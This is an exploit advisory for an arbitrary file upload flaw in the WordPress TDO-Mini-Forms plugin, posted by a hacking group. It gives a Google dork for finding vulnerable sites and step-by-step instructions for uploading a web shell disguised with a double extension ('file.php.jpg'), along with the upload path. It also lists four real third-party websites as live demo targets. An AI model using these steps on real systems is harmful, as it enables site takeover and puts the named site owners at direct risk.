###############################################################
# Exploit Title: Wordpress TDO-Mini-Forms Plugin Arbitrary File Upload
Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 12/09/2013
# Vendor Homepage: http://thedeadone.net
# Software Link :
http://cznic.dl.sourceforge.net/project/filip/wordpress/tdo-mini-forms.0.13.9.zip
# Google dork: inurl:/wp-content/plugins/tdo-mini-forms/
# Tested on: Windows/Linux
###############################################################

1)Exploit :
= = = = = =
1.Go to http://
[target]/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=[ID]&index=
2.Click To Browse And Select Your Shell Script(ex file.php.jpg)
3.Clict to Upload Now for upload

# Uploaded files :
http://127.0.0.1/wp-content/uploads/tdomf/tmp/[FormID]/[YourIP]/file.php.jpg

2) Exploit demo :
= = = = = = = = =
http://moiatadieta.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://100mostbeautifulbabies.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://pawsintograce.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://activeyouth.co.uk/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=

# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #